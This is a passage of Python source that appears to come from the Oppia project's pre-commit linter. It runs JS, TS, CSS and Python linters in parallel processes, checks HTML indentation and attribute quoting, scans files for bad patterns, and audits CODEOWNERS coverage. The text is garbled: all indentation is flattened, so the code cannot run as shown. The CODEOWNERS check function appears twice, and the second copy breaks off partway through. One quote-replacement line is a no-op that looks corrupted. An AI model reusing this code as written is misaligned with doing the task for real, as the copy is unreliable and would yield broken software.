_STDOUT_LIST = multiprocessing.Manager().list()
_FILES = multiprocessing.Manager().dict()
class FileCache(python_utils.OBJECT):
"""Provides thread-safe access to cached file content."""
def __init__(self):
self._CACHE_DATA_DICT = {}
def read(self, filepath, mode='r'):
"""Returns the data read from the file in unicode form.
Args:
filepath: str. The file path from which data is to be read.
mode: str. The mode in which the file is to be opened.
Returns:
str. The data read from the file.
"""
return self._get_data(filepath, mode)[0]
def readlines(self, filepath, mode='r'):
"""Returns the tuple containing data line by line as read from the
file in unicode form.
Args:
filepath: str. The file path from which data is to be read.
mode: str. The mode in which the file is to be opened.
Returns:
tuple(str). The tuple containing data line by line as read from the
file.
"""
return self._get_data(filepath, mode)[1]
def _get_data(self, filepath, mode):
"""Returns the collected data from the file corresponding to the given
filepath.
Args:
filepath: str. The file path from which data is to be read.
mode: str. The mode in which the file is to be opened.
Returns:
tuple(str, tuple(str)). The tuple containing data read from the file
as first element and tuple containing the text line by line as
second element.
"""
key = (filepath, mode)
if key not in self._CACHE_DATA_DICT:
with python_utils.open_file(filepath, mode) as f:
lines = f.readlines()
self._CACHE_DATA_DICT[key] = (''.join(lines), tuple(lines))
return self._CACHE_DATA_DICT[key]
def _lint_all_files(
js_filepaths, ts_filepaths, py_filepaths, html_filepaths,
css_filepaths, verbose_mode_enabled):
"""This function is used to check if node-eslint dependencies are
installed and pass ESLint binary path and lint all the files(JS, Python,
HTML, CSS) with their respective third party linters.
Args:
js_filepaths: list(str). The list of js filepaths to be linted.
ts_filepaths: list(str). The list of ts filepaths to be linted.
py_filepaths: list(str). The list of python filepaths to be linted.
html_filepaths: list(str). The list of HTML filepaths to be linted.
css_filepaths: list(str). The list of CSS filepaths to be linted.
verbose_mode_enabled: bool. True if verbose mode is enabled.
Returns:
linting_processes: list(multiprocessing.Process). A list of linting
processes.
result_queues: list(multiprocessing.Queue). A list of queues to put
results of tests.
stdout_queus: list(multiprocessing.Queue). A list of queues to store
Stylelint outputs.
"""
python_utils.PRINT('Starting Js, Ts, Python, HTML, and CSS linter...')
pylintrc_path = os.path.join(os.getcwd(), '.pylintrc')
config_pylint = '--rcfile=%s' % pylintrc_path
config_pycodestyle = os.path.join(os.getcwd(), 'tox.ini')
parent_dir = os.path.abspath(os.path.join(os.getcwd(), os.pardir))
node_path = os.path.join(
parent_dir, 'oppia_tools', 'node-10.15.3', 'bin', 'node')
eslint_path = os.path.join(
'node_modules', 'eslint', 'bin', 'eslint.js')
stylelint_path = os.path.join(
'node_modules', 'stylelint', 'bin', 'stylelint.js')
config_path_for_css_in_html = os.path.join(
parent_dir, 'oppia', '.stylelintrc')
config_path_for_oppia_css = os.path.join(
parent_dir, 'oppia', 'core', 'templates', 'dev', 'head',
'css', '.stylelintrc')
if not (os.path.exists(eslint_path) and os.path.exists(stylelint_path)):
python_utils.PRINT('')
python_utils.PRINT(
'ERROR Please run start.sh first to install node-eslint ')
python_utils.PRINT(
' or node-stylelint and its dependencies.')
sys.exit(1)
js_and_ts_files_to_lint = js_filepaths + ts_filepaths
linting_processes = []
js_and_ts_result = multiprocessing.Queue()
linting_processes.append(multiprocessing.Process(
target=_lint_js_and_ts_files, args=(
node_path, eslint_path, js_and_ts_files_to_lint,
js_and_ts_result, verbose_mode_enabled)))
css_in_html_result = multiprocessing.Queue()
css_in_html_stdout = multiprocessing.Queue()
linting_processes.append(multiprocessing.Process(
target=_lint_css_files, args=(
node_path,
stylelint_path,
config_path_for_css_in_html,
html_filepaths, css_in_html_stdout,
css_in_html_result, verbose_mode_enabled)))
css_result = multiprocessing.Queue()
css_stdout = multiprocessing.Queue()
linting_processes.append(multiprocessing.Process(
target=_lint_css_files, args=(
node_path,
stylelint_path,
config_path_for_oppia_css,
css_filepaths, css_stdout,
css_result, verbose_mode_enabled)))
py_result = multiprocessing.Queue()
linting_processes.append(multiprocessing.Process(
target=_lint_py_files,
args=(
config_pylint, config_pycodestyle, py_filepaths,
py_result, verbose_mode_enabled)))
py_result_for_python3_compatibility = multiprocessing.Queue()
linting_processes.append(multiprocessing.Process(
target=_lint_py_files_for_python3_compatibility,
args=(
py_filepaths, py_result_for_python3_compatibility,
verbose_mode_enabled)))
for process in linting_processes:
process.daemon = False
process.start()
result_queues = [
js_and_ts_result, css_in_html_result, css_result, py_result,
py_result_for_python3_compatibility
]
stdout_queus = [
css_in_html_stdout, css_stdout
]
return linting_processes, result_queues, stdout_queus
def _is_filepath_excluded_for_bad_patterns_check(pattern, filepath):
"""Checks if file is excluded from the bad patterns check.
Args:
pattern: str. The pattern to be checked against.
filepath: str. Path of the file.
Returns:
bool: Whether to exclude the given file from this
particular pattern check.
"""
return (any(filepath.startswith(bad_pattern)
for bad_pattern in BAD_PATTERNS[pattern]['excluded_dirs'])
or filepath in BAD_PATTERNS[pattern]['excluded_files'])
def _get_expression_from_node_if_one_exists(
parsed_node, components_to_check):
"""This function first checks whether the parsed node represents
the required angular component that needs to be derived by checking if
its in the 'components_to_check' list. If yes, then it will return the
expression part of the node from which the component can be derived.
If no, it will return None. It is done by filtering out
'AssignmentExpression' (as it represents an assignment) and 'Identifier'
(as it represents a static expression).
Args:
parsed_node: dict. Parsed node of the body of a JS file.
components_to_check: list(str). List of angular components to check
in a JS file. These include directives, factories, controllers,
etc.
Returns:
expression: dict or None. Expression part of the node if the node
represents a component else None.
"""
if parsed_node.type != 'ExpressionStatement':
return
# Separate the expression part of the node which is the actual
# content of the node.
expression = parsed_node.expression
# Check whether the expression belongs to a
# 'CallExpression' which always contains a call
# and not an 'AssignmentExpression'.
# For example, func() is a CallExpression.
if expression.type != 'CallExpression':
return
# Check whether the expression belongs to a 'MemberExpression' which
# represents a computed expression or an Identifier which represents
# a static expression.
# For example, 'thing.func' is a MemberExpression where
# 'thing' is the object of the MemberExpression and
# 'func' is the property of the MemberExpression.
# Another example of a MemberExpression within a CallExpression is
# 'thing.func()' where 'thing.func' is the callee of the CallExpression.
if expression.callee.type != 'MemberExpression':
return
# Get the component in the JS file.
component = expression.callee.property.name
if component not in components_to_check:
return
return expression
def _walk_with_gitignore(root, exclude_dirs):
"""A walk function similar to os.walk but this would ignore the files and
directories which is not tracked by git. Also, this will ignore the
directories mentioned in exclude_dirs.
Args:
root: str. The path from where the function should start walking.
exclude_dirs: list(str). A list of dir path which should be ignored.
Yields:
list(str). A list of unignored files.
"""
dirs, file_paths = [], []
for name in os.listdir(root):
if os.path.isdir(os.path.join(root, name)):
dirs.append(os.path.join(root, name))
else:
file_paths.append(os.path.join(root, name))
yield [file_path for file_path in file_paths if not _is_path_ignored(
file_path)]
for dir_path in dirs:
# Adding "/" in the end of the dir path according to the git dir path
# structure.
if (not _is_path_ignored(dir_path + '/')) and (
dir_path not in exclude_dirs):
for x in _walk_with_gitignore(dir_path, exclude_dirs):
yield x
def _is_path_ignored(path_to_check):
"""Checks whether the given path is ignored by git.
Args:
path_to_check: str. A path to a file or a dir.
Returns:
bool. Whether the given path is ignored by git.
"""
command = ['git', 'check-ignore', '-q', path_to_check]
# The "git check-ignore <path>" command returns 0 when the path is ignored
# otherwise it returns 1. subprocess.call then returns this returncode.
if subprocess.call(command):
return False
else:
return True
def _get_changed_filepaths():
"""Returns a list of modified files (both staged and unstaged)
Returns:
a list of filepaths of modified files.
"""
unstaged_files = subprocess.check_output([
'git', 'diff', '--name-only',
'--diff-filter=ACM']).splitlines()
staged_files = subprocess.check_output([
'git', 'diff', '--cached', '--name-only',
'--diff-filter=ACM']).splitlines()
all_changed_filepaths = unstaged_files + staged_files
return [filepath for filepath in all_changed_filepaths]
def _get_all_files_in_directory(dir_path, excluded_glob_patterns):
"""Recursively collects all files in directory and
subdirectories of specified path.
Args:
dir_path: str. Path to the folder to be linted.
excluded_glob_patterns: set(str). Set of all glob patterns
to be excluded.
Returns:
a list of files in directory and subdirectories without excluded files.
"""
files_in_directory = []
for _dir, _, files in os.walk(dir_path):
for file_name in files:
filepath = os.path.relpath(
os.path.join(_dir, file_name), os.getcwd())
if not any([fnmatch.fnmatch(filepath, gp) for gp in
excluded_glob_patterns]):
files_in_directory.append(filepath)
return files_in_directory
@contextlib.contextmanager
def _redirect_stdout(new_target):
"""Redirect stdout to the new target.
Args:
new_target: TextIOWrapper. The new target to which stdout is redirected.
Yields:
TextIOWrapper. The new target.
"""
old_target = sys.stdout
sys.stdout = new_target
try:
yield new_target
finally:
sys.stdout = old_target
def _get_all_filepaths(input_path, input_filenames):
"""This function is used to return the filepaths which needs to be linted
and checked.
Args:
input_path: str. The path of the directory to be linted and checked.
input_filenames: list(str). The list of filenames to be linted and
checked, ignored if input_path is specified.
Returns:
all_filepaths: list(str). The list of filepaths to be linted and
checked.
"""
eslintignore_path = os.path.join(os.getcwd(), '.eslintignore')
if input_path:
input_path = os.path.join(os.getcwd(), input_path)
if not os.path.exists(input_path):
python_utils.PRINT(
'Could not locate file or directory %s. Exiting.' % input_path)
python_utils.PRINT('----------------------------------------')
sys.exit(1)
if os.path.isfile(input_path):
all_filepaths = [input_path]
else:
excluded_glob_patterns = FILE_CACHE.readlines(eslintignore_path)
all_filepaths = _get_all_files_in_directory(
input_path, excluded_glob_patterns)
elif input_filenames:
valid_filepaths = []
invalid_filepaths = []
for filename in input_filenames:
if os.path.isfile(filename):
valid_filepaths.append(filename)
else:
invalid_filepaths.append(filename)
if invalid_filepaths:
python_utils.PRINT(
'The following file(s) do not exist: %s\n'
'Exiting.' % invalid_filepaths)
sys.exit(1)
all_filepaths = valid_filepaths
else:
all_filepaths = _get_changed_filepaths()
all_filepaths = [
filename for filename in all_filepaths if not
any(fnmatch.fnmatch(filename, pattern) for pattern in EXCLUDED_PATHS)]
return all_filepaths
def _check_bad_pattern_in_file(filepath, file_content, pattern):
"""Detects whether the given pattern is present in the file.
Args:
filepath: str. Path of the file.
file_content: str. Contents of the file.
pattern: dict. (regexp(regex pattern) : pattern to match,
message(str) : message to show if pattern matches,
excluded_files(tuple(str)) : files to be excluded from matching,
excluded_dirs(tuple(str)) : directories to be excluded from
matching).
Object containing details for the pattern to be checked.
Returns:
bool. True if there is bad pattern else false.
"""
regexp = pattern['regexp']
if not (any(filepath.startswith(excluded_dir)
for excluded_dir in pattern['excluded_dirs'])
or filepath in pattern['excluded_files']):
bad_pattern_count = 0
for line_num, line in enumerate(file_content.split('\n'), 1):
if line.endswith('disable-bad-pattern-check'):
continue
if regexp.search(line):
python_utils.PRINT('%s --> Line %s: %s' % (
filepath, line_num, pattern['message']))
python_utils.PRINT('')
bad_pattern_count += 1
if bad_pattern_count:
return True
return False
def _check_file_type_specific_bad_pattern(filepath, content):
"""Check the file content based on the file's extension.
Args:
filepath: str. Path of the file.
content: str. Contents of the file.
Returns:
failed: bool. True if there is bad pattern else false.
total_error_count: int. The number of errors.
"""
_, extension = os.path.splitext(filepath)
pattern = BAD_PATTERNS_MAP.get(extension)
failed = False
total_error_count = 0
if pattern:
for regexp in pattern:
if _check_bad_pattern_in_file(filepath, content, regexp):
failed = True
total_error_count += 1
return failed, total_error_count
class TagMismatchException(Exception):
"""Error class for mismatch between start and end tags."""
pass
class CustomHTMLParser(html.parser.HTMLParser):
"""Custom HTML parser to check indentation."""
def __init__(self, filepath, file_lines, debug, failed=False):
"""Define various variables to parse HTML.
Args:
filepath: str. path of the file.
file_lines: list(str). list of the lines in the file.
debug: bool. if true prints tag_stack for the file.
failed: bool. true if the HTML indentation check fails.
"""
html.parser.HTMLParser.__init__(self)
self.tag_stack = []
self.debug = debug
self.failed = failed
self.filepath = filepath
self.file_lines = file_lines
self.indentation_level = 0
self.indentation_width = 2
self.void_elements = [
'area', 'base', 'br', 'col', 'embed',
'hr', 'img', 'input', 'link', 'meta',
'param', 'source', 'track', 'wbr']
def handle_starttag(self, tag, attrs):
"""Handle start tag of a HTML line.
Args:
tag: str. start tag of a HTML line.
attrs: list(str). list of attributes in the start tag.
"""
line_number, column_number = self.getpos()
# Check the indentation of the tag.
expected_indentation = self.indentation_level * self.indentation_width
tag_line = self.file_lines[line_number - 1].lstrip()
opening_tag = '<' + tag
# Check the indentation for content of style tag.
if tag_line.startswith(opening_tag) and tag == 'style':
# Getting next line after style tag.
next_line = self.file_lines[line_number]
next_line_expected_indentation = (
self.indentation_level + 1) * self.indentation_width
next_line_column_number = len(next_line) - len(next_line.lstrip())
if next_line_column_number != next_line_expected_indentation:
python_utils.PRINT(
'%s --> Expected indentation '
'of %s, found indentation of %s '
'for content of %s tag on line %s ' % (
self.filepath, next_line_expected_indentation,
next_line_column_number, tag, line_number + 1))
python_utils.PRINT('')
self.failed = True
if tag_line.startswith(opening_tag) and (
column_number != expected_indentation):
python_utils.PRINT(
'%s --> Expected indentation '
'of %s, found indentation of %s '
'for %s tag on line %s ' % (
self.filepath, expected_indentation,
column_number, tag, line_number))
python_utils.PRINT('')
self.failed = True
if tag not in self.void_elements:
self.tag_stack.append((tag, line_number, column_number))
self.indentation_level += 1
if self.debug:
python_utils.PRINT('DEBUG MODE: Start tag_stack')
python_utils.PRINT(self.tag_stack)
# Check the indentation of the attributes of the tag.
indentation_of_first_attribute = (
column_number + len(tag) + 2)
starttag_text = self.get_starttag_text()
# Check whether the values of all attributes are placed
# in double quotes.
for attr, value in attrs:
# Not all attributes will have a value.
# Therefore the check should run only for those
# attributes which have a value.
if value:
expected_value = '"' + value + '"'
# " is rendered as a double quote by the parser.
if '"' in starttag_text:
rendered_text = starttag_text.replace('"', '"')
else:
rendered_text = starttag_text
if not expected_value in rendered_text:
self.failed = True
python_utils.PRINT(
'%s --> The value %s of attribute '
'%s for the tag %s on line %s should '
'be enclosed within double quotes.' % (
self.filepath, value, attr,
tag, line_number))
python_utils.PRINT('')
for line_num, line in enumerate(starttag_text.splitlines()):
if line_num == 0:
continue
leading_spaces_count = len(line) - len(line.lstrip())
list_of_attrs = []
for attr, _ in attrs:
list_of_attrs.append(attr)
if not line.lstrip().startswith(tuple(list_of_attrs)):
continue
if indentation_of_first_attribute != leading_spaces_count:
line_num_of_error = line_number + line_num
python_utils.PRINT(
'%s --> Attribute for tag %s on line '
'%s should align with the leftmost '
'attribute on line %s ' % (
self.filepath, tag,
line_num_of_error, line_number))
python_utils.PRINT('')
self.failed = True
def handle_endtag(self, tag):
"""Handle end tag of a HTML line.
Args:
tag: str. end tag of a HTML line.
"""
line_number, _ = self.getpos()
tag_line = self.file_lines[line_number - 1]
leading_spaces_count = len(tag_line) - len(tag_line.lstrip())
try:
last_starttag, last_starttag_line_num, last_starttag_col_num = (
self.tag_stack.pop())
except IndexError:
raise TagMismatchException('Error in line %s of file %s\n' % (
line_number, self.filepath))
if last_starttag != tag:
raise TagMismatchException('Error in line %s of file %s\n' % (
line_number, self.filepath))
if leading_spaces_count != last_starttag_col_num and (
last_starttag_line_num != line_number):
python_utils.PRINT(
'%s --> Indentation for end tag %s on line '
'%s does not match the indentation of the '
'start tag %s on line %s ' % (
self.filepath, tag, line_number,
last_starttag, last_starttag_line_num))
python_utils.PRINT('')
self.failed = True
self.indentation_level -= 1
if self.debug:
python_utils.PRINT('DEBUG MODE: End tag_stack')
python_utils.PRINT(self.tag_stack)
def handle_data(self, data):
"""Handle indentation level.
Args:
data: str. contents of HTML file to be parsed.
"""
data_lines = data.split('\n')
opening_block = tuple(
['{% block', '{% macro', '{% if', '% for', '% if'])
ending_block = tuple(['{% end', '{%- end', '% } %>'])
for data_line in data_lines:
data_line = data_line.lstrip()
if data_line.startswith(opening_block):
self.indentation_level += 1
elif data_line.startswith(ending_block):
self.indentation_level -= 1
def check_for_important_patterns_at_bottom_of_codeowners(important_patterns):
"""Checks that the most important patterns are at the bottom
of the CODEOWNERS file.
Arguments:
important_patterns: list(str). List of the important
patterns for CODEOWNERS file.
Returns:
bool. Whether the CODEOWNERS "important pattern" check fails.
"""
failed = False
# Check that there are no duplicate elements in the lists.
important_patterns_set = set(important_patterns)
codeowner_important_paths_set = set(CODEOWNER_IMPORTANT_PATHS)
if len(important_patterns_set) != len(important_patterns):
python_utils.PRINT(
'%s --> Duplicate pattern(s) found in critical rules'
' section.' % CODEOWNER_FILEPATH)
failed = True
if len(codeowner_important_paths_set) != len(CODEOWNER_IMPORTANT_PATHS):
python_utils.PRINT(
'scripts/pre_commit_linter.py --> Duplicate pattern(s) found '
'in CODEOWNER_IMPORTANT_PATHS list.')
failed = True
# Check missing rules by set difference operation.
critical_rule_section_minus_list_set = (
important_patterns_set.difference(codeowner_important_paths_set))
list_minus_critical_rule_section_set = (
codeowner_important_paths_set.difference(important_patterns_set))
for rule in critical_rule_section_minus_list_set:
python_utils.PRINT(
'%s --> Rule %s is not present in the '
'CODEOWNER_IMPORTANT_PATHS list in '
'scripts/pre_commit_linter.py. Please add this rule in the '
'mentioned list or remove this rule from the \'Critical files'
'\' section.' % (CODEOWNER_FILEPATH, rule))
failed = True
for rule in list_minus_critical_rule_section_set:
python_utils.PRINT(
'%s --> Rule \'%s\' is not present in the \'Critical files\' '
'section. Please place it under the \'Critical files\' '
'section since it is an important rule. Alternatively please '
'remove it from the \'CODEOWNER_IMPORTANT_PATHS\' list in '
'scripts/pre_commit_linter.py if it is no longer an '
'important rule.' % (CODEOWNER_FILEPATH, rule))
failed = True
return failed
def _check_codeowner_file(verbose_mode_enabled):
"""Checks the CODEOWNERS file for any uncovered dirs/files and also
checks that every pattern in the CODEOWNERS file matches at least one
file/dir. Note that this checks the CODEOWNERS file according to the
glob patterns supported by Python2.7 environment. For more information
please refer https://docs.python.org/2/library/glob.html.
This function also ensures that the most important rules are at the
bottom of the CODEOWNERS file.
"""
if verbose_mode_enabled:
python_utils.PRINT('Starting CODEOWNERS file check')
python_utils.PRINT('----------------------------------------')
with _redirect_stdout(_TARGET_STDOUT):
failed = False
summary_messages = []
# Checks whether every pattern in the CODEOWNERS file matches at
# least one dir/file.
critical_file_section_found = False
important_rules_in_critical_section = []
file_patterns = []
dir_patterns = []
for line_num, line in enumerate(FILE_CACHE.readlines(
CODEOWNER_FILEPATH)):
stripped_line = line.strip()
if '# Critical files' in line:
critical_file_section_found = True
if stripped_line and stripped_line[0] != '#':
if '@' not in line:
python_utils.PRINT(
'%s --> Pattern on line %s doesn\'t have '
'codeowner' % (CODEOWNER_FILEPATH, line_num + 1))
failed = True
else:
# Extract the file pattern from the line.
line_in_concern = line.split('@')[0].strip()
# This is being populated for the important rules
# check.
if critical_file_section_found:
important_rules_in_critical_section.append(
line_in_concern)
# Checks if the path is the full path relative to the
# root oppia directory.
if not line_in_concern.startswith('/'):
python_utils.PRINT(
'%s --> Pattern on line %s is invalid. Use '
'full path relative to the root directory'
% (CODEOWNER_FILEPATH, line_num + 1))
failed = True
# The double asterisks pattern is supported by the
# CODEOWNERS syntax but not the glob in Python 2.
# The following condition checks this.
if '**' in line_in_concern:
python_utils.PRINT(
'%s --> Pattern on line %s is invalid. '
'\'**\' wildcard not allowed' % (
CODEOWNER_FILEPATH, line_num + 1))
failed = True
# Adjustments to the dir paths in CODEOWNERS syntax
# for glob-style patterns to match correctly.
if line_in_concern.endswith('/'):
line_in_concern = line_in_concern[:-1]
# The following condition checks whether the specified
# path exists in the codebase or not. The CODEOWNERS
# syntax has paths starting with '/' which refers to
# full path relative to root, but python glob module
# does not conform to this logic and literally matches
# the '/' character. Therefore the leading '/' has to
# be changed to './' for glob patterns to match
# correctly.
line_in_concern = line_in_concern.replace('/', './', 1)
if not glob.glob(line_in_concern):
python_utils.PRINT(
'%s --> Pattern on line %s doesn\'t match '
'any file or directory' % (
CODEOWNER_FILEPATH, line_num + 1))
failed = True
# The following list is being populated with the
# paths in the CODEOWNERS file with the removal of the
# leading '/' to aid in the glob pattern matching in
# the next part of the check wherein the valid patterns
# are used to check if they cover the entire codebase.
if os.path.isdir(line_in_concern):
dir_patterns.append(line_in_concern)
else:
file_patterns.append(line_in_concern)
# Checks that every file (except those under the dir represented by
# the dir_patterns) is covered under CODEOWNERS.
for file_paths in _walk_with_gitignore('.', dir_patterns):
for file_path in file_paths:
match = False
for file_pattern in file_patterns:
if file_path in glob.glob(file_pattern):
match = True
break
if not match:
python_utils.PRINT(
'%s is not listed in the .github/CODEOWNERS file.' % (
file_path))
failed = True
failed = failed or (
check_for_important_patterns_at_bottom_of_codeowners(
important_rules_in_critical_section))
if failed:
summary_message = (
'%s CODEOWNERS file coverage check failed, see messages '
'above for files that need to be added or patterns that need '
'to be fixed.' % _MESSAGE_TYPE_FAILED)
else:
summary_message = '%s CODEOWNERS file coverage check passed' % (
_MESSAGE_TYPE_SUCCESS)
summary_messages.append(summary_message)
python_utils.PRINT(summary_message)
python_utils.PRINT('')
return summary_messages
def _lint_css_files(
node_path, stylelint_path, config_path, files_to_lint, stdout, result,
verbose_mode_enabled):
"""Prints a list of lint errors in the given list of CSS files.
Args:
node_path: str. Path to the node binary.
stylelint_path: str. Path to the Stylelint binary.
config_path: str. Path to the configuration file.
files_to_lint: list(str). A list of filepaths to lint.
stdout: multiprocessing.Queue. A queue to store Stylelint outputs.
result: multiprocessing.Queue. A queue to put results of test.
verbose_mode_enabled: bool. True if verbose mode is enabled.
"""
start_time = time.time()
num_files_with_errors = 0
num_css_files = len(files_to_lint)
if not files_to_lint:
result.put('')
python_utils.PRINT('There are no CSS files to lint.')
return
python_utils.PRINT('Total css files: ', num_css_files)
stylelint_cmd_args = [
node_path, stylelint_path, '--config=' + config_path]
result_list = []
if not verbose_mode_enabled:
python_utils.PRINT('Linting CSS files.')
for _, filepath in enumerate(files_to_lint):
if verbose_mode_enabled:
python_utils.PRINT('Linting: ', filepath)
proc_args = stylelint_cmd_args + [filepath]
proc = subprocess.Popen(
proc_args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
encoded_linter_stdout, encoded_linter_stderr = proc.communicate()
linter_stdout = encoded_linter_stdout.decode(encoding='utf-8')
linter_stderr = encoded_linter_stderr.decode(encoding='utf-8')
if linter_stderr:
python_utils.PRINT('LINTER FAILED')
python_utils.PRINT(linter_stderr)
sys.exit(1)
if linter_stdout:
num_files_with_errors += 1
result_list.append(linter_stdout)
python_utils.PRINT(linter_stdout)
stdout.put(linter_stdout)
if num_files_with_errors:
for error in result_list:
result.put(error)
result.put('%s %s CSS file' % (
_MESSAGE_TYPE_FAILED, num_files_with_errors))
else:
result.put('%s %s CSS file linted (%.1f secs)' % (
_MESSAGE_TYPE_SUCCESS, num_css_files, time.time() - start_time))
python_utils.PRINT('CSS linting finished.')
def _lint_js_and_ts_files(
node_path, eslint_path, files_to_lint, result, verbose_mode_enabled):
"""Prints a list of lint errors in the given list of JavaScript files.
Args:
node_path: str. Path to the node binary.
eslint_path: str. Path to the ESLint binary.
files_to_lint: list(str). A list of filepaths to lint.
result: multiprocessing.Queue. A queue to put results of test.
verbose_mode_enabled: bool. True if verbose mode is enabled.
"""
start_time = time.time()
num_files_with_errors = 0
num_js_and_ts_files = len(files_to_lint)
if not files_to_lint:
result.put('')
python_utils.PRINT(
'There are no JavaScript or Typescript files to lint.')
return
python_utils.PRINT('Total js and ts files: ', num_js_and_ts_files)
eslint_cmd_args = [node_path, eslint_path, '--quiet']
result_list = []
python_utils.PRINT('Linting JS and TS files.')
for _, filepath in enumerate(files_to_lint):
if verbose_mode_enabled:
python_utils.PRINT('Linting: ', filepath)
proc_args = eslint_cmd_args + [filepath]
proc = subprocess.Popen(
proc_args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
encoded_linter_stdout, encoded_linter_stderr = proc.communicate()
linter_stdout = encoded_linter_stdout.decode(encoding='utf-8')
linter_stderr = encoded_linter_stderr.decode(encoding='utf-8')
if linter_stderr:
python_utils.PRINT('LINTER FAILED')
python_utils.PRINT(linter_stderr)
sys.exit(1)
if linter_stdout:
num_files_with_errors += 1
result_list.append(linter_stdout)
if num_files_with_errors:
for error in result_list:
result.put(error)
result.put('%s %s JavaScript and Typescript files' % (
_MESSAGE_TYPE_FAILED, num_files_with_errors))
else:
result.put(
'%s %s JavaScript and Typescript files linted (%.1f secs)' % (
_MESSAGE_TYPE_SUCCESS, num_js_and_ts_files,
time.time() - start_time))
python_utils.PRINT('Js and Ts linting finished.')
def _lint_py_files(
config_pylint, config_pycodestyle, files_to_lint, result,
verbose_mode_enabled):
"""Prints a list of lint errors in the given list of Python files.
Args:
config_pylint: str. Path to the .pylintrc file.
config_pycodestyle: str. Path to the tox.ini file.
files_to_lint: list(str). A list of filepaths to lint.
result: multiprocessing.Queue. A queue to put results of test.
verbose_mode_enabled: bool. True if verbose mode is enabled.
"""
start_time = time.time()
are_there_errors = False
num_py_files = len(files_to_lint)
if not files_to_lint:
result.put('')
python_utils.PRINT('There are no Python files to lint.')
return
python_utils.PRINT('Linting %s Python files' % num_py_files)
_batch_size = 50
current_batch_start_index = 0
while current_batch_start_index < len(files_to_lint):
# Note that this index is an exclusive upper bound -- i.e., the current
# batch of files ranges from 'start_index' to 'end_index - 1'.
current_batch_end_index = min(
current_batch_start_index + _batch_size, len(files_to_lint))
current_files_to_lint = files_to_lint[
current_batch_start_index: current_batch_end_index]
if verbose_mode_enabled:
python_utils.PRINT('Linting Python files %s to %s...' % (
current_batch_start_index + 1, current_batch_end_index))
with _redirect_stdout(_TARGET_STDOUT):
# This line invokes Pylint and prints its output
# to the target stdout.
pylinter = lint.Run(
current_files_to_lint + [config_pylint],
exit=False).linter
# These lines invoke Pycodestyle and print its output
# to the target stdout.
style_guide = pycodestyle.StyleGuide(config_file=config_pycodestyle)
pycodestyle_report = style_guide.check_files(
paths=current_files_to_lint)
if pylinter.msg_status != 0 or pycodestyle_report.get_count() != 0:
result.put(_TARGET_STDOUT.getvalue())
are_there_errors = True
current_batch_start_index = current_batch_end_index
if are_there_errors:
result.put('%s Python linting failed' % _MESSAGE_TYPE_FAILED)
else:
result.put('%s %s Python files linted (%.1f secs)' % (
_MESSAGE_TYPE_SUCCESS, num_py_files, time.time() - start_time))
python_utils.PRINT('Python linting finished.')
def _lint_py_files_for_python3_compatibility(
files_to_lint, result, verbose_mode_enabled):
"""Prints a list of Python 3 compatibility errors in the given list of
Python files.
Args:
files_to_lint: list(str). A list of filepaths to lint.
result: multiprocessing.Queue. A queue to put results of test.
verbose_mode_enabled: bool. True if verbose mode is enabled.
"""
start_time = time.time()
any_errors = False
files_to_lint_for_python3_compatibility = [
file_name for file_name in files_to_lint if not re.match(
r'^.*python_utils.*\.py$', file_name)]
num_py_files = len(files_to_lint_for_python3_compatibility)
if not files_to_lint_for_python3_compatibility:
result.put('')
python_utils.PRINT(
'There are no Python files to lint for Python 3 compatibility.')
return
python_utils.PRINT(
'Linting %s Python files for Python 3 compatibility.' % num_py_files)
_batch_size = 50
current_batch_start_index = 0
while current_batch_start_index < len(
files_to_lint_for_python3_compatibility):
# Note that this index is an exclusive upper bound -- i.e., the current
# batch of files ranges from 'start_index' to 'end_index - 1'.
current_batch_end_index = min(
current_batch_start_index + _batch_size, len(
files_to_lint_for_python3_compatibility))
current_files_to_lint = files_to_lint_for_python3_compatibility[
current_batch_start_index: current_batch_end_index]
if verbose_mode_enabled:
python_utils.PRINT(
'Linting Python files for Python 3 compatibility %s to %s...'
% (current_batch_start_index + 1, current_batch_end_index))
with _redirect_stdout(_TARGET_STDOUT):
# This line invokes Pylint and prints its output
# to the target stdout.
python_utils.PRINT('Messages for Python 3 support:')
pylinter_for_python3 = lint.Run(
current_files_to_lint + ['--py3k'], exit=False).linter
if pylinter_for_python3.msg_status != 0:
result.put(_TARGET_STDOUT.getvalue())
any_errors = True
current_batch_start_index = current_batch_end_index
if any_errors:
result.put(
'%s Python linting for Python 3 compatibility failed'
% _MESSAGE_TYPE_FAILED)
else:
result.put(
'%s %s Python files linted for Python 3 compatibility (%.1f secs)'
% (_MESSAGE_TYPE_SUCCESS, num_py_files, time.time() - start_time))
python_utils.PRINT('Python linting for Python 3 compatibility finished.')
def _check_codeowner_file(verbose_mode_enabled):
"""Checks the CODEOWNERS file for any uncovered dirs/files and also
checks that every pattern in the CODEOWNERS file matches at least one
file/dir. Note that this checks the CODEOWNERS file according to the
glob patterns supported by Python2.7 environment. For more information
please refer https://docs.python.org/2/library/glob.html.
This function also ensures that the most important rules are at the
bottom of the CODEOWNERS file.
"""
if verbose_mode_enabled:
python_utils.PRINT('Starting CODEOWNERS file check')
python_utils.PRINT('----------------------------------------')
with _redirect_stdout(_TARGET_STDOUT):
failed = False
summary_messages = []
# Checks whether every pattern in the CODEOWNERS file matches at
# least one dir/file.
critical_file_section_found = False
important_rules_in_critical_section = []
file_patterns = []
dir_patterns = []
for line_num, line in enumerate(FILE_CACHE.readlines(
CODEOWNER_FILEPATH)):
stripped_line = line.strip()
if '# Critical files' in line:
critical_file_section_found = True
if stripped_line and stripped_line[0] != '#':
if '@' not in line:
python_utils.PRINT(
'%s --> Pattern on line %s doesn\'t have '
'codeowner' % (CODEOWNER_FILEPATH, line_num + 1))
failed = True
else:
# Extract the file pattern from the line.
line_in_concern = line.split('@')[0].strip()
# This is being populated for the important rules
# check.
if critical_file_section_found:
important_rules_in_critical_section.append(
line_in_concern)
# Checks if the path is the full path relative to the
# root oppia directory.
if not line_in_concern.startswith('/'):
python_utils.PRINT(
'%s --> Pattern on line %s is invalid. Use '
'full path relative to the root directory'
% (CODEOWNER_FILEPATH, line_num + 1))
failed = True
# The double asterisks pattern is supported by the
# CODEOWNERS syntax but not the glob in Python 2.
# The following condition checks this.
if '**' in line_in_concern:
python_utils.PRINT(
'%s --> Pattern on line %s is invalid. '
'\'**\' wildcard not allowed' % (
CODEOWNER_FILEPATH, line_num + 1))
failed = True
# Adjustments to the dir paths in CODEOWNERS syntax
# for glob-style patterns to match correctly.
if line_in_concern.endswith('/'):
line_in_concern = line_in_concern[:-1]
# The following condition checks whether the specified
# path exists in the codebase or not. The CODEOWNERS
